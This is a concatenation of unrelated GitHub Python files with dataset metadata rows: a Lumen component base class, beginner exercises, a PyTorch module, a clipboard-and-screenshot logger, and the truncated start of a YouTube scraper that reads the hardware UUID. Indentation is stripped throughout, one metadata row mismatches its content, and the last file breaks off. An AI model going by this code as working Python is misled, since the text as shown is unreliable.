analetisouza/daily-problem
|
day1.py
|
day1.py
|
py
| 1,266 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32660332596
|
"""
Implements the baseclasses for all Component types in Lumen.
The base classes implement the core validation logic and the ability
to dynamically resolve Source and Variable references.
"""
from __future__ import annotations
import warnings
from functools import partial
from typing import (
Any, ClassVar, Dict, List, Tuple, Type,
)
import pandas as pd
import panel as pn
import param # type: ignore
from panel.io.cache import _container_hash, _hash_funcs
from panel.util import classproperty
from typing_extensions import Literal
from .state import state
from .util import (
VARIABLE_RE, cleanup_expr, is_ref, resolve_module_reference,
)
from .validation import (
ValidationError, match_suggestion_message, reverse_match_suggestion,
validate_parameters,
)
class Component(param.Parameterized):
"""
Baseclass for all Lumen component types including Source, Filter,
Transform, Variable and View types. Components must implement
serialization and deserialization into a specification dictionary
via the `from_spec` and `to_spec` protocol. Additonally they
should implement validation.
"""
__abstract = True
# Whether the component allows references
_allows_refs: ClassVar[bool] = True
# Parameters that are computed internally and are not part of the
# component specification
_internal_params: ClassVar[List[str]] = ['name']
# Deprecated parameters that are still allowed as spec keys
_legacy_params: ClassVar[List[str]] = []
# Keys that must be declared declared as a list of strings or
# tuples of strings if one of multiple must be defined.
_required_keys: ClassVar[List[str | Tuple[str, ...]]] = []
# Keys that are valid to define
_valid_keys: ClassVar[List[str] | Literal['params'] | None] = None
# Whether to enforce parameter validation in specification
_validate_params: ClassVar[bool] = False
def __init__(self, **params):
self._refs = params.pop('refs', {})
expected = list(self.param)
validate_parameters(params, expected, type(self).name)
if self._allows_refs:
params = self._extract_refs(params, self._refs)
super().__init__(**params)
for p, ref in self._refs.items():
if isinstance(state.variables, dict):
continue
elif isinstance(ref, str) and '$variables' in ref:
ref_vars = VARIABLE_RE.findall(ref)
state.variables.param.watch(partial(self._update_ref, p, ref), ref_vars)
if '.' not in p and p not in params:
self._update_ref(p, ref)
def _extract_refs(self, params: Dict[str, Any], refs: Dict[str, Any]):
from .variables import Variable
processed = {}
for pname, pval in params.items():
if is_ref(pval):
refs[pname] = pval
elif isinstance(pval, (pn.widgets.Widget, param.Parameter, Variable)):
var = state.variables.add_variable(pval)
processed[pname] = var.value
refs[pname] = f'$variables.{var.name}'
continue
elif isinstance(pval, dict):
subrefs = {}
processed[pname] = self._extract_refs(pval, subrefs)
for subkey, subref in subrefs.items():
refs[f'{pname}.{subkey}'] = subref
continue
else:
processed[pname] = pval
return processed
def _update_ref(self, pname: str, ref: str, *events: param.parameterized.Event):
"""
Component should implement appropriate downstream events
following a change in a variable.
"""
expr = cleanup_expr(ref)
new_value = pd.eval(expr, local_dict=dict(state.variables), engine='python')
if '.' in pname:
pname, *keys = pname.split('.')
old = getattr(self, pname)
current = new = old.copy()
for k in keys[:-1]:
current = current[k]
current[keys[-1]] = new_value
else:
new = new_value
self.param.update({pname: new})
def _sync_refs(self, trigger: bool = True):
updates = []
for p, ref in self._refs.items():
if isinstance(state.variables, dict):
continue
elif isinstance(ref, str) and '$variables' in ref:
with param.discard_events(self):
self._update_ref(p, ref)
pname, *_ = p.split('.')
updates.append(pname)
if trigger:
self.param.trigger(*updates)
##################################################################
# Validation API
##################################################################
@classproperty
def _valid_keys_(cls) -> List[str] | None:
if cls._valid_keys == 'params':
valid = [p for p in cls.param if p not in cls._internal_params]
else:
valid = cls._valid_keys
return valid if valid is None else valid + cls._legacy_params
@classmethod
def _validate_keys_(cls, spec: Dict[str, Any]):
valid_keys = cls._valid_keys_
for key in spec:
if valid_keys is None or key in valid_keys:
continue
msg = f'{cls.__name__} component specification contained unknown key {key!r}.'
msg = match_suggestion_message(key, cls._valid_keys_ or [], msg)
raise ValidationError(msg, spec, key)
@classmethod
def _validate_required_(
cls, spec: Dict[str, Any], required: List[str | Tuple[str, ...]] | None = None
):
if required is None:
required_keys = cls._required_keys
else:
required_keys = required
for key in required_keys:
if isinstance(key, str):
if key in spec:
continue
msg = f'The {cls.__name__} component requires {key!r} parameter to be defined.'
msg, attr = reverse_match_suggestion(key, list(spec), msg)
raise ValidationError(msg, spec, attr)
elif isinstance(key, tuple):
if any(f in spec for f in key):
continue
skey = sorted(key)
key_str = "', '".join(skey[:-1]) + f"' or '{skey[-1]}"
msg = f"{cls.__name__} component requires one of '{key_str}' to be defined."
for f in key:
msg, attr = reverse_match_suggestion(f, list(spec), msg)
if attr:
break
raise ValidationError(msg, spec, attr)
@classmethod
def _validate_list_subtypes(
cls, key: str, subtype: Type[Component], subtype_specs: List[Dict[str, Any] | str],
spec: Dict[str, Any], context: Dict[str, Any], subcontext: List[Dict[str, Any] | str] | None = None
):
if not isinstance(subtype_specs, list):
raise ValidationError(
f'{cls.__name__} component {key!r} key expected list type but got {type(subtype_specs).__name__}. '
"This could be because of a missing dash in the yaml file.",
spec, key
)
subtypes = []
for subtype_spec in subtype_specs:
subtype_spec = subtype.validate(subtype_spec, context)
subtypes.append(subtype_spec)
if subcontext is not None:
subcontext.append(subtype_spec)
return subtypes
@classmethod
def _validate_dict_subtypes(
cls, key: str, subtype: Type[Component], subtype_specs: Dict[str, Dict[str, Any] | str],
spec: Dict[str, Any], context: Dict[str, Any], subcontext: Dict[str, Any] | None = None
):
if not isinstance(subtype_specs, dict):
raise ValidationError(
f'{cls.__name__} component {key!r} key expected dict type but got {type(subtype_specs).__name__}.',
spec, key
)
subtypes = {}
for subtype_name, subtype_spec in subtype_specs.items():
subtypes[subtype_name] = subtype.validate(subtype_spec, context)
if subcontext is not None:
subcontext[subtype_name] = subtypes[subtype_name]
return subtypes
@classmethod
def _validate_str_or_spec(
cls, key: str, subtype: Type[Component], subtype_spec: Dict[str, Any] | str,
spec: Dict[str, Any], context: Dict[str, Any]
):
if isinstance(subtype_spec, str):
if subtype_spec not in context[f'{key}s']:
msg = f'{cls.__name__} component specified non-existent {key} {subtype_spec!r}.'
msg = match_suggestion_message(subtype_spec, list(context[key]), msg)
raise ValidationError(msg, spec, subtype_spec)
return subtype_spec
return subtype.validate(subtype_spec, context)
@classmethod
def _validate_dict_or_list_subtypes(
cls, key: str, subtype: Type[Component], subtype_specs: Dict[str, Dict[str, Any] | str] | List[Dict[str, Any] | str],
spec: Dict[str, Any], context: Dict[str, Any], subcontext: Dict[str, Any] | List[Dict[str, Any] | str] | None = None
):
if isinstance(subtype_specs, list):
assert subcontext is None or isinstance(subcontext, list)
return cls._validate_list_subtypes(key, subtype, subtype_specs, spec, context, subcontext)
else:
assert subcontext is None or isinstance(subcontext, dict)
return cls._validate_dict_subtypes(key, subtype, subtype_specs, spec, context, subcontext)
@classmethod
def _deprecation(
cls, msg: str, key: str, spec: Dict[str, Any], update: Dict[str, Any]
):
warnings.warn(msg, DeprecationWarning)
if key not in spec:
spec[key] = {}
spec[key].update(update)
@classmethod
def _validate_ref(
cls, key: str, value: Any, spec: Dict[str, Any], context: Dict[str, Any]
):
refs = value[1:].split('.')
if refs[0] == 'variables':
if refs[1] not in context.get('variables', {}):
msg = f'{cls.__name__} component {key!r} references undeclared variable {value!r}.'
msg = match_suggestion_message(refs[1], list(context.get('variables', {})), msg)
raise ValidationError(msg, spec, refs[1])
elif refs[0] not in context.get('sources', {}):
msg = f'{cls.__name__} component {key!r} references undeclared source {value!r}.'
msg = match_suggestion_message(refs[1], list(context.get('sources', {})), msg)
raise ValidationError(msg, spec, refs[1])
@classmethod
def _validate_param(cls, key: str, value: Any, spec: Dict[str, Any]):
pobj = cls.param[key]
try:
if isinstance(pobj, param.Selector) and pobj.names and value in pobj.names:
return
pobj._validate(value)
except Exception as e:
msg = f"{cls.__name__} component {key!r} value failed validation: {str(e)}"
raise ValidationError(msg, spec, key)
@classmethod
def _is_component_key(cls, key: str) -> bool:
if key not in cls.param:
return False
pobj = cls.param[key]
return (
isinstance(pobj, param.ClassSelector) and
isinstance(pobj.class_, type) and
issubclass(pobj.class_, Component)
)
@classmethod
def _is_list_component_key(cls, key: str) -> bool:
if key not in cls.param:
return False
pobj = cls.param[key]
return (
isinstance(pobj, param.List) and
isinstance(pobj.item_type, type) and
issubclass(pobj.item_type, Component)
)
@classmethod
def _validate_spec_(
cls, spec: Dict[str, Any], context: Dict[str, Any] | None = None
) -> Dict[str, Any]:
validated: Dict[str, Any] = {}
if context is None:
context = validated
for key in (cls._valid_keys_ or list(spec)):
if key not in spec:
continue
val = spec[key]
if is_ref(val) and not cls._allows_refs:
raise ValidationError(
f'{cls.__name__} component does not allow references but {key} '
f'value ({val!r}) is a reference.', spec, val
)
if hasattr(cls, f'_validate_{key}'):
val = getattr(cls, f'_validate_{key}')(val, spec, context)
elif cls._is_component_key(key):
val = cls.param[key].class_.validate(val, context)
elif cls._is_list_component_key(key):
val = cls._validate_list_subtypes(
key, cls.param[key].item_type, val, spec, context
)
elif is_ref(val):
cls._validate_ref(key, val, spec, context)
elif key in cls.param:
if isinstance(val, str) and val.startswith('@'):
continue
cls._validate_param(key, val, spec)
validated[key] = val
return validated
##################################################################
# Public API
##################################################################
@property
def refs(self) -> List[str]:
return [v for k, v in self._refs.items() if v.startswith('$variables.')]
@classmethod
def from_spec(cls, spec: Dict[str, Any] | str) -> 'Component':
"""
Creates a Component instance from a specification.
Parameters
----------
spec : dict or str
Specification declared as a dictionary of parameter values
or a string referencing a source in the sources dictionary.
Returns
-------
Resolved and instantiated Component object
"""
if isinstance(spec, str):
raise ValueError(
"Component cannot be materialized by reference. Please pass "
"full specification for the component."
)
return cls(**spec)
def to_spec(self, context: Dict[str, Any] | None = None) -> Dict[str, Any]:
"""
Exports the full specification to reconstruct this component.
Parameters
----------
context: Dict[str, Any]
Context contains the specification of all previously serialized components,
e.g. to allow resolving of references.
Returns
-------
Declarative specification of this component.
"""
spec = {}
for p, value in self.param.values().items():
if p in self._internal_params or value == self.param[p].default:
continue
elif self._is_component_key(p):
pspec = value.to_spec(context=context)
if not pspec:
continue
value = pspec
elif self._is_list_component_key(p):
value = [
None if v is None else v.to_spec(context=context)
for v in value
]
spec[p] = value
if context is not None:
spec.update(self._refs)
return spec
@classmethod
def validate(
cls, spec: Dict[str, Any] | str, context: Dict[str, Any] | None = None
) -> Dict[str, Any] | str:
"""
Validates the component specification given the validation context.
Arguments
-----------
spec: dict | str
The specification for the component being validated (or a referene to the component)
context: dict
Validation context contains the specification of all previously validated components,
e.g. to allow resolving of references.
Returns
--------
Validated specification.
"""
if isinstance(spec, str):
return spec
context = {} if context is None else context
cls._validate_keys_(spec)
cls._validate_required_(spec)
return cls._validate_spec_(spec, context)
class MultiTypeComponent(Component):
"""
MultiComponentType is the baseclass for extensible Lumen components.
A `MultiTypeComponent` can be resolved using the `_get_type` method
either by the name declared in the `<component>_type` attribute,
where the name of the component represent the immediate subclasses
of MultiTypeComponent. For example `class View(MultiTypeComponent)`
should define `view_type` for all its descendants to override.
Just as any other Component, `MultiTypeComponent` implements
methods to construct an instance from a specification, export the
specification of a component and the ability to validate a
component.
"""
__abstract = True
_required_keys: ClassVar[List[str | Tuple[str, ...]]] = ['type']
@classproperty
def _valid_keys_(cls) -> List[str | Tuple[str, ...]] | None:
if cls._valid_keys is None:
valid = None
elif cls._valid_keys == 'params':
valid = list(cls.param)
elif 'params' in cls._valid_keys:
valid = cls._valid_keys.copy()
valid.extend(list(cls.param))
else:
valid = cls._valid_keys.copy()
if valid is not None and 'type' not in valid:
valid.append('type')
return valid if valid is None else valid + cls._legacy_params
@classproperty
def _base_type(cls):
if cls is MultiTypeComponent:
return
return cls.__mro__[cls.__mro__.index(MultiTypeComponent)-1]
@classproperty
def _component_type(cls) -> str:
component_type = getattr(cls, f'{cls._base_type.__name__.lower()}_type')
if component_type is not None:
return component_type
return f'{cls.__module__}.{cls.__name__}'
@classmethod
def _import_module(cls, component_type: str):
base_type = cls._base_type
try:
import_name = f'lumen.{base_type.__name__.lower()}s.{component_type}'
__import__(import_name)
except ImportError as e:
if e.name != import_name:
msg = (
f"In order to use the {base_type.__name__.lower()} "
f"component '{component_type}', the '{e.name}' package "
"must be installed."
)
raise ImportError(msg)
@classmethod
def _get_type(
cls, component_type: str, spec: Dict[str, Any] | None = None
) -> Type['MultiTypeComponent']:
base_type = cls._base_type
if component_type is None:
raise ValidationError(
f"No 'type' was provided during instantiation of {base_type.__name__} component.",
spec
)
if '.' in component_type:
return resolve_module_reference(component_type, base_type)
cls._import_module(component_type)
subcls_types = set()
for subcls in param.concrete_descendents(cls).values():
subcls_type = subcls._component_type
if subcls_type is None:
continue
subcls_types.add(subcls_type)
if subcls_type == component_type:
return subcls
msg = f"{base_type.__name__} component specification declared unknown type '{component_type}'."
msg = match_suggestion_message(component_type, list(subcls_types), msg)
raise ValidationError(msg, spec, component_type)
##################################################################
# Public API
##################################################################
@classmethod
def from_spec(cls, spec: Dict[str, Any] | str) -> 'MultiTypeComponent':
if isinstance(spec, str):
raise ValueError(
"MultiTypeComponent cannot be materialized by reference. Please pass "
"full specification for the MultiTypeComponent."
)
spec = dict(spec)
component_cls = cls._get_type(spec.pop('type'), spec)
return component_cls(**spec)
def to_spec(self, context: Dict[str, Any] | None = None) -> Dict[str, Any]:
"""
Exports the full specification to reconstruct this component.
Returns
-------
Resolved and instantiated Component object
"""
spec = super().to_spec(context=context)
spec['type'] = self._component_type
return spec
@classmethod
def validate(
cls, spec: Dict[str, Any] | str, context: Dict[str, Any] | None = None
) -> Dict[str, Any] | str:
"""
Validates the component specification given the validation context and the path.
Arguments
-----------
spec: dict | str
The specification for the component being validated or a reference to the component.
context: dict
Validation context contains the specification of all previously validated components,
e.g. to allow resolving of references.
Returns
--------
Validated specification.
"""
if isinstance(spec, str):
return spec
context = {} if context is None else context
if 'type' not in spec:
msg = f'{cls.__name__} component specification did not declare a type.'
msg, attr = reverse_match_suggestion('type', list(spec), msg)
raise ValidationError(msg, spec, attr)
component_cls = cls._get_type(spec['type'], spec)
component_cls._validate_keys_(spec)
component_cls._validate_required_(spec)
return component_cls._validate_spec_(spec, context)
_hash_funcs[Component] = lambda component: _container_hash(component.to_spec())
|
holoviz/lumen
|
lumen/base.py
|
base.py
|
py
| 22,041 |
python
|
en
|
code
| 149 |
github-code
|
6
|
72960115387
|
"""def reverse(a):
while a:
#for i in a:
if a != " ":
b = a[::-1]
print("Reversed string is: ", b)
if b == a:
print("Works")
else:
print("Bummer!")
return
reverse("roor")"""
"""prefixes = 'JKLMNOPQ'
suffix = 'ack'
#i = 0
for letter in prefixes:
if letter == 'O':
letter = letter + 'u'
print(letter + suffix)
elif letter == 'Q':
letter = letter + 'u'
print(letter + suffix)
else:
print(letter + suffix)
#i = i + 1
"""
"""a = "fruit"
print(a[:])"""
def find(word, letter, index):
#index = 0
while index < len(word):
if word[index] == letter:
return index
index = index + 1
return -1
print(find("aderinsola", "a", 0))
"""def count(word, letter):
count = 0
a = []
b = 0
for a in word:
if letter == a[b]:
count = count + 1
print(count, end="")
count("abracadabra", "a")"""
"""def count(word, letter):
count = 0
a = []
b = 0
#c = b
for a in word:
if letter == a[b]:
count = count + 1
print(count, end="")
count("abracadabra", "a")"""
"""def count(word, letter):
count = 0
a = []
b = 0
#c = 0
#while c <= b:
#while word != " ":
# c = 0
for a in word:
if letter == a[b]:
count = count + 1
#c = c + 1
print(count, end="")
#c = c + 1
count("abracadabra", "a")"""
"""a = "rood"
b = []
while a:
c = 0
for i in a:
if a != " ":
b = a[::-1]
print(b, end="")
break
c = c + 1"""
#print(a)
#b = a[::-1]
#print(b)
"""if b == a:
print("Works!")
else:
print("Ouch! That sucks!")"""
"""def any_lowercase(s):
for c in s:
if c.islower():
#b = c
return True #if lowercase in the middle, this doesn't
else: #perform as it should
return False
def any_lowercase2(s):
for c in s:
if 'c'.islower():
return 'True'
else:
return 'False'
def any_lowercase3(s):
for c in s:
flag = c.islower()
return flag
def any_lowercase4(s):
flag = False
for c in s:
flag = flag or c.islower()
return flag
def any_lowercase5(s):
for c in s:
if not c.islower():
return False #This works well!
return True
#print(any_lowercase2("ADERINSOLA"))
def rotate_word(s, i):
holder = ""
for v in s:
c = ord(v)
if c >= ord('a') and c <= ord('z'):
if c > ord('m'):
c -= i
else:
c += i
elif c >= ord('A') and c <= ord('Z'):
if c > ord ('M'):
c -= i
else:
c += i
holder += chr(c)
return holder
print(rotate_word("The Quick Brown Fox Jumps Over The Lazy Dog", 13))"""
|
derinsola01/Projects
|
chapter8codes.py
|
chapter8codes.py
|
py
| 2,589 |
python
|
en
|
code
| 0 |
github-code
|
6
|
17334218878
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import re,os,sys
import random
import argparse
parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('--per', dest='per', type=int, default=10, help='ratio of test set (%)')
parser.add_argument('--file', dest='file', type=str, default='data_from_USPTO_utf8_converted_clear', help='input file')
args = parser.parse_args()
params = vars(args)
print(params)
file = params['file']
test_percent = params['per']
# select n% as test set
def select_file(fin,test_p):
lines = open(fin,'r+').readlines()[1:] #remove the first title line and the last blank line
writer1= open(fin+'_train', 'w')
writer2= open(fin+'_test', 'w')
all_num = len(lines)
test_num = int(all_num*(test_p*0.01))
print('all num: %d' %all_num)
print('test num: %d' %test_num)
print('train num: %d' %(all_num-test_num))
print('slecting...')
test_set = random.sample(lines, test_num)
for item in test_set:
lines.remove(item)
print('selected')
writer1.writelines(lines)
writer2.writelines(test_set)
select_file(file, test_percent)
|
jshmjs45/data_for_chem
|
codes/select_file.py
|
select_file.py
|
py
| 1,111 |
python
|
en
|
code
| 13 |
github-code
|
6
|
38153977020
|
#if an element in an m x n matrix is 0, it's entire
#row and column are set to zero
#O(m*n) solution: loops through matrix twice,
#first time to find the rows and columns with zeros
#in them, and second time to assign each value in those
#rows cols to zero
def zero_matrix(m):
row = {}
col = {}
for i in range(len(m)):
for j in range(len(m[0])):
if(m[i][j] == 0):
if(i not in row):
row[i] = 1
if(j not in col):
col[j] = 1
#set all vals in row to zero
for i in row:
for j in range(len(m[0])):
m[i][j] = 0
#set all vals in col to zero
for j in col:
for i in range(len(m)):
m[i][j] = 0
return(m)
m = [[1,0,1,1],[1,1,1,1],[0,1,1,0],[1,1,1,1]]
print(zero_matrix(m))
|
BlakeMcMurray/Coding-Problem-Solutions
|
Arrays/zeroMatrix.py
|
zeroMatrix.py
|
py
| 842 |
python
|
en
|
code
| 0 |
github-code
|
6
|
37616127622
|
import time
import os
from richxerox import *
from tinydb import TinyDB, where
HOME_DIR = 'static/db'
# Create directory if it doesn't exist
os.system("mkdir %s" % HOME_DIR)
db = TinyDB('%s/db.json' % HOME_DIR)
currently_found_in_clipboard = paste(format='text')
while True:
time.sleep(0.1) # one tenth of a second
if paste(format='text') != currently_found_in_clipboard:
currently_found_in_clipboard = paste(format='text')
# When the user hits CMD+C store the clipboard in a file and take a screenshot of the screen
created_at = time.time()
entry = { 'content': pasteall(), 'created_at': int(created_at),}
entry['screenshot'] = '%s/screen%s.png' % (HOME_DIR, created_at)
os.system("screencapture %s" % entry['screenshot'])
db.insert(entry)
|
pantacuzino/personalkb
|
script.py
|
script.py
|
py
| 807 |
python
|
en
|
code
| 0 |
github-code
|
6
|
71520783227
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import math
from detectron2.detectron2.layers import FrozenBatchNorm2d, ShapeSpec, get_norm
_NORM = 'BN'
class Conv2d_BN(nn.Module):
"""Convolution with BN module."""
def __init__(
self,
in_ch,
out_ch,
kernel_size=1,
stride=1,
pad=0,
dilation=1,
groups=1,
bn_weight_init=1,
act_layer=None,
):
super().__init__()
self.in_ch = in_ch
self.out_ch = out_ch
self.conv = torch.nn.Conv2d(in_ch,
out_ch,
kernel_size,
stride,
pad,
dilation,
groups,
bias=False
)
self.bn = get_norm(_NORM, out_ch)
torch.nn.init.constant_(self.bn.weight, bn_weight_init)
torch.nn.init.constant_(self.bn.bias, 0)
for m in self.modules():
if isinstance(m, nn.Conv2d):
# Note that there is no bias due to BN
fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(mean=0.0, std=np.sqrt(2.0 / fan_out))
self.act_layer = act_layer() if act_layer is not None else nn.Identity()
def forward(self, x):
# ain = self.in_ch
# aout = self.out_ch
x = self.conv(x)
x = self.bn(x)
x = self.act_layer(x)
return x
class Dila_PRM(nn.Module):
def __init__(self,in_embed,out_embed,kernel_size=4,downsample_ratio=1,dilations=[2,4,6],
fusion='cat'):
super().__init__()
self.dilations = dilations
self.in_embed = in_embed
# self.in_embeds=[self.in_embed,self.in_embed//2,self.in_embed//4]
# self.out_embeds=[self.in_embed,self.in_embed//2,self.in_embed//4]
self.out_embed = out_embed
self.fusion = fusion
self.kernel_size = kernel_size
self.stride = downsample_ratio
#self.out_size = img_size//downsample_ratio
self.convs = nn.ModuleList(
[
nn.Sequential(
nn.Conv2d(
in_channels=self.in_embed,
out_channels=self.in_embed,
kernel_size=self.kernel_size,
stride=self.stride,
# padding=math.ceil(((self.kernel_size-1)*self.dilations[idx] + 1 - self.stride) / 2),
padding=math.ceil(((self.kernel_size-1)*self.dilations[idx])/2),
dilation=self.dilations[idx]),
# nn.BatchNorm2d(self.in_embed),
nn.GELU()
) for idx in range(len(self.dilations))
]
)
if self.fusion == 'cat':
self.outchans = self.in_embed * len(self.dilations)
'''这里可以改一改,不同尺度的特征维度尽量少'''
#self.aggerate = Conv2d_BN(self.in_embed*len(self.dilations),self.in_embed,act_layer=nn.Hardswish)
self.aggerate = Conv2d_BN(self.in_embed*len(self.dilations),self.out_embed,act_layer=nn.Hardswish)
def forward(self,x):
B,C,H,W = x.shape #1,3,320,320
out = self.convs[0](x).unsqueeze(dim=-1)
for i in range(1,len(self.dilations)):
cur_out = self.convs[i](x).unsqueeze(dim=-1)
out = torch.cat((cur_out,out),dim=-1)
B, C, W, H, N = out.shape
#cur_size = (W,H)
if self.fusion=='cat':
out = out.permute(0,4,1,2,3).reshape(B,N*C,W,H)
out = self.aggerate(out)
# out = out.flatten(2).transpose(1,2) #B,N,C
return out
|
LiaoYun0x0/BiFormer
|
models/dila_prm.py
|
dila_prm.py
|
py
| 4,008 |
python
|
en
|
code
| 0 |
github-code
|
6
|
40467207556
|
def solution(box):
maxBox = max(box)
if maxBox == box[0]:
return box[0]
start, end = 0, maxBox
answer = maxBox
while start <= end:
mid = (start + end) // 2
crit = 0
for b in box:
crit += b - mid
if crit > 0:
start = mid + 1
break
if crit <= 0: #
end = mid - 1
answer = min(answer, mid)
else:
start = mid + 1
return answer
print(solution([500, 999, 400]))
|
Cho-El/coding-test-practice
|
프로그래머스 문제/파이썬/2022 카카오 채용연계형 겨울 테크 인턴십 코딩테스트/3.py
|
3.py
|
py
| 552 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30375207065
|
from random import randint
de = randint(1,6)
print(de)
secret = randint(0,1000)
for essai in range(10):
print("Devinez mon nombre secret :")
nombreSaisi = int(input())
if nombreSaisi == secret:
print("Bravo, vous êtes perspicace.")
break
else:
print("Et non, bien tenté.")
|
vguisse/job
|
2nde/algo/entree_test/ex4.py
|
ex4.py
|
py
| 318 |
python
|
fr
|
code
| 0 |
github-code
|
6
|
8772037717
|
import requests,re,threading,os, sys,random,copy,random,json,httpx,hashlib
from loguru import logger
from wmi import WMI
from urllib.request import urlopen
from time import sleep
from colorama import init, Fore, Style
from urllib.parse import urlencode
from typing import Union, List
__version__ = "2-5"
HWID = WMI().Win32_ComputerSystemProduct()[0].UUID
CLIENTS = {
"MWEB": {
'context': {
'client': {
'clientName': 'MWEB',
'clientVersion': '2.20211109.01.00'
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
},
"ANDROID": {
'context': {
'client': {
'clientName': 'ANDROID',
'clientVersion': '16.20'
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
},
"ANDROID_EMBED": {
'context': {
'client': {
'clientName': 'ANDROID',
'clientVersion': '16.20',
'clientScreen': 'EMBED'
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
},
"TV_EMBED": {
"context": {
"client": {
"clientName": "TVHTML5_SIMPLY_EMBEDDED_PLAYER",
"clientVersion": "2.0"
},
"thirdParty": {
"embedUrl": "https://www.youtube.com/",
}
},
'api_key': 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
}
}
requestPayload = {
"context": {
"client": {
"clientName": "WEB",
"clientVersion": "2.20210224.06.00",
"newVisitorCookie": True,
},
"user": {
"lockedSafetyMode": False,
}
}
}
userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'
searchKey = 'AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8'
videoElementKey = 'videoRenderer'
channelElementKey = 'channelRenderer'
playlistElementKey = 'playlistRenderer'
shelfElementKey = 'shelfRenderer'
itemSectionKey = 'itemSectionRenderer'
continuationItemKey = 'continuationItemRenderer'
richItemKey = 'richItemRenderer'
hashtagVideosPath = ['contents', 'twoColumnBrowseResultsRenderer', 'tabs', 0, 'tabRenderer', 'content', 'richGridRenderer', 'contents']
hashtagContinuationVideosPath = ['onResponseReceivedActions', 0, 'appendContinuationItemsAction', 'continuationItems']
contentPath = ['contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'sectionListRenderer', 'contents']
fallbackContentPath = ['contents', 'twoColumnSearchResultsRenderer', 'primaryContents', 'richGridRenderer', 'contents']
continuationContentPath = ['onResponseReceivedCommands', 0, 'appendContinuationItemsAction', 'continuationItems']
continuationKeyPath = ['continuationItemRenderer', 'continuationEndpoint', 'continuationCommand', 'token']
def getValue(source: dict, path: List[str]) -> Union[str, int, dict, None]:
value = source
for key in path:
if type(key) is str:
if key in value.keys():
value = value[key]
else:
value = None
break
elif type(key) is int:
if len(value) != 0:
value = value[key]
else:
value = None
break
return value
def getVideoId(videoLink: str) -> str:
if 'youtu.be' in videoLink:
if videoLink[-1] == '/':
return videoLink.split('/')[-2]
return videoLink.split('/')[-1]
elif 'youtube.com' in videoLink:
if '&' not in videoLink:
return videoLink[videoLink.index('v=') + 2:]
return videoLink[videoLink.index('v=') + 2: videoLink.index('&')]
else:
return videoLink
class ComponentHandler:
def _getVideoComponent(self, element: dict, shelfTitle: str = None) -> dict:
video = element[videoElementKey]
component = {
'type': 'video',
'id': self._getValue(video, ['videoId']),
'title': self._getValue(video, ['title', 'runs', 0, 'text']),
'publishedTime': self._getValue(video, ['publishedTimeText', 'simpleText']),
'duration': self._getValue(video, ['lengthText', 'simpleText']),
'viewCount': {
'text': self._getValue(video, ['viewCountText', 'simpleText']),
'short': self._getValue(video, ['shortViewCountText', 'simpleText']),
},
'thumbnails': self._getValue(video, ['thumbnail', 'thumbnails']),
'richThumbnail': self._getValue(video, ['richThumbnail', 'movingThumbnailRenderer', 'movingThumbnailDetails', 'thumbnails', 0]),
'descriptionSnippet': self._getValue(video, ['detailedMetadataSnippets', 0, 'snippetText', 'runs']),
'channel': {
'name': self._getValue(video, ['ownerText', 'runs', 0, 'text']),
'id': self._getValue(video, ['ownerText', 'runs', 0, 'navigationEndpoint', 'browseEndpoint', 'browseId']),
'thumbnails': self._getValue(video, ['channelThumbnailSupportedRenderers', 'channelThumbnailWithLinkRenderer', 'thumbnail', 'thumbnails']),
},
'accessibility': {
'title': self._getValue(video, ['title', 'accessibility', 'accessibilityData', 'label']),
'duration': self._getValue(video, ['lengthText', 'accessibility', 'accessibilityData', 'label']),
},
}
component['link'] = 'https://www.youtube.com/watch?v=' + component['id']
component['channel']['link'] = 'https://www.youtube.com/channel/' + component['channel']['id']
component['shelfTitle'] = shelfTitle
return component
def _getChannelComponent(self, element: dict) -> dict:
channel = element[channelElementKey]
component = {
'type': 'channel',
'id': self._getValue(channel, ['channelId']),
'title': self._getValue(channel, ['title', 'simpleText']),
'thumbnails': self._getValue(channel, ['thumbnail', 'thumbnails']),
'videoCount': self._getValue(channel, ['videoCountText', 'runs', 0, 'text']),
'descriptionSnippet': self._getValue(channel, ['descriptionSnippet', 'runs']),
'subscribers': self._getValue(channel, ['subscriberCountText', 'simpleText']),
}
component['link'] = 'https://www.youtube.com/channel/' + component['id']
return component
def _getVideoFromChannelSearch(self, elements: list) -> list:
channelsearch = []
for element in elements:
element = self._getValue(element, ["childVideoRenderer"])
json = {
"id": self._getValue(element, ["videoId"]),
"title": self._getValue(element, ["title", "simpleText"]),
"uri": self._getValue(element, ["navigationEndpoint", "commandMetadata", "webCommandMetadata", "url"]),
"duration": {
"simpleText": self._getValue(element, ["lengthText", "simpleText"]),
"text": self._getValue(element, ["lengthText", "accessibility", "accessibilityData", "label"])
}
}
channelsearch.append(json)
return channelsearch
def _getChannelSearchComponent(self, elements: list) -> list:
channelsearch = []
for element in elements:
responsetype = None
if 'gridPlaylistRenderer' in element:
element = element['gridPlaylistRenderer']
responsetype = 'gridplaylist'
elif 'itemSectionRenderer' in element:
first_content = element["itemSectionRenderer"]["contents"][0]
if 'videoRenderer' in first_content:
element = first_content['videoRenderer']
responsetype = "video"
elif 'playlistRenderer' in first_content:
element = first_content["playlistRenderer"]
responsetype = "playlist"
else:
raise Exception(f'Unexpected first_content {first_content}')
elif 'continuationItemRenderer' in element:
# for endless scrolling, not needed here
# TODO: Implement endless scrolling
continue
else:
raise Exception(f'Unexpected element {element}')
if responsetype == "video":
json = {
"id": self._getValue(element, ["videoId"]),
"thumbnails": {
"normal": self._getValue(element, ["thumbnail", "thumbnails"]),
"rich": self._getValue(element, ["richThumbnail", "movingThumbnailRenderer", "movingThumbnailDetails", "thumbnails"])
},
"title": self._getValue(element, ["title", "runs", 0, "text"]),
